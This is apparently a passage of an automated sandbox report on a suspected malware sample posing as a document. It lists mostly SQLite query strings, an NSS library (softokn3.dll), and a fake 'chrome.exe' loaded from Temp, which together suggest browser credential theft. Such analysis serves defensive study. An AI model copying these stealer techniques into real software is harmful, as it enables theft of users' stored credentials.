Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79944286859.0000000005E45000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79950935060.0000000006150000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516008280.000000000603B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81148238884.0000000006150000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945562253.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946624029.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941413846.0000000005E44000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941126369.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945466909.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516925103.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83517655529.00000000061E8000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946513603.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79944286859.0000000005E45000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79950935060.0000000006150000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516008280.000000000603B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81148238884.0000000006150000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945562253.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946624029.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941413846.0000000005E44000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941126369.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945466909.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516925103.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83517655529.00000000061E8000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946513603.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79944286859.0000000005E45000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79950935060.0000000006150000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516008280.000000000603B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80997267130.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003280204.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81004430159.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81148238884.0000000006150000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945562253.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946624029.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941413846.0000000005E44000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000903880.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941126369.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000650649.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945466909.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003090471.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516925103.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83517655529.00000000061E8000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946513603.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79944286859.0000000005E45000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79950935060.0000000006150000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516008280.000000000603B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81148238884.0000000006150000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945562253.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946624029.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941413846.0000000005E44000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945466909.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516925103.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83517655529.00000000061E8000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946513603.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79944286859.0000000005E45000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79950935060.0000000006150000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516008280.000000000603B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81148238884.0000000006150000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945562253.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946624029.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941413846.0000000005E44000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941126369.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945466909.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516925103.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83517655529.00000000061E8000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946513603.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80997267130.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003280204.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81004430159.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000903880.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000650649.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003090471.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80997267130.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003280204.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81004430159.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000903880.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000650649.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003090471.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80997267130.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003280204.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81004430159.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000903880.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000650649.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003090471.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s;
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79944286859.0000000005E45000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79950935060.0000000006150000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516008280.000000000603B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80997267130.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003280204.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81004430159.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81148238884.0000000006150000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945562253.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946624029.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941413846.0000000005E44000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000903880.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000650649.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945466909.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003090471.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516925103.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83517655529.00000000061E8000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946513603.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79944286859.0000000005E45000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79950935060.0000000006150000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516008280.000000000603B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80997267130.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003280204.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81004430159.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81148238884.0000000006150000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945562253.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946624029.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941413846.0000000005E44000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000903880.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941126369.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000650649.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945466909.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003090471.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516925103.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83517655529.00000000061E8000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946513603.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81012939877.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81010861865.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81007454020.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81014511114.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81010600849.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81013135435.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80997267130.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003280204.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81004430159.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000903880.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000650649.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003090471.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81012939877.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81010861865.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81007454020.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81014511114.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81010600849.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81013135435.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
